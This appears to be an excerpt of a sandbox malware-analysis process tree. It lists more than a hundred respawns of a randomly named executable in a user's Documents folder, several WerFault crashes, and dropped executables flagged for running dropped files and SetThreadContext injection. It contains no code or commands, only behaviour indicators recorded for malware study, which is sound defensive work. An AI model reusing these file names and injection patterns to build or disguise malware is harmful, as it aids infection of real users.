C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9140
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7448
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3228
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5304
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8084
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9480
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2436
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6124
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5944
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9348
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9204
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3808
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8244 -s 284⤵
- Program crash
PID:4000
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4420
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4760
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8172
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8256
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9972
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1404
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7464
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9696
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3548
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4340
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8952
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9152
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10124
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9016
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8976
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6496
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8368
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6844
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:6264
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5468
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8928
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 284⤵
- Program crash
PID:10692
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10564
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10928
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 284⤵
- Program crash
PID:8072
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10760
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10760 -s 284⤵
- Program crash
PID:10908
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11120
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10632
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11980
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11340
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10072
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12680
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12904
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11964
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13408
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14060
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13464
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14048
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13348
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13604
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10868
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14536
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15180
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13468
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15072
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10576
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12240
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11432
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9444
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4352
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15828
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16292
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11644
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14140
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16176
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15688
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15284
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13268
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15620
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13888
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14624
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4708
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1104
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:7412
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3468
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16732
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16684
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3456
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11328
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17404
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16284
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14092
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10368
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17792
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:18000
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:18204
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12096
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:18188
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:18236
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15168
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3504
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17552
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:5664
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16892
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8476
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12752
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12244
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17628
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15576
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15704
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17888
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11188
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:10968
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9824
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3360
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:512
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17472
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1900
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17668
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:12912
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16788
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16412
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8580
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14520
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1004
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17996
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:4520
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16968
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16276
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9716
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17532
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:16100
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:1620
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17908
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:348
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13568
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11528
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11636
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13184
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:8424
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15348
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17572
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:3860
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:9192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9192 -s 284⤵
- Program crash
PID:6764
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:14296
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15936
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15220
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:13640
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:17992
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:11844
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:2256
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵PID:15280
-
-
-
C:\Users\Admin\Documents\S2XPB9E_c2fXgAtzyOsjFidz.exe"C:\Users\Admin\Documents\S2XPB9E_c2fXgAtzyOsjFidz.exe"2⤵
- Executes dropped EXE
PID:2312 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:3024
-
-
C:\Program Files (x86)\Company\NewProduct\inst1.exe"C:\Program Files (x86)\Company\NewProduct\inst1.exe"3⤵PID:4904
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4156
-
-
-
C:\Users\Admin\Documents\uFkBkc5ExbcwhNMe_DNXMk3Z.exe"C:\Users\Admin\Documents\uFkBkc5ExbcwhNMe_DNXMk3Z.exe"2⤵
- Executes dropped EXE
PID:2580
-
-
C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4720 -
C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"C:\Users\Admin\Documents\DZJdoQBawZIRTjYfBFodSs03.exe"3⤵PID:3044
-
-
-
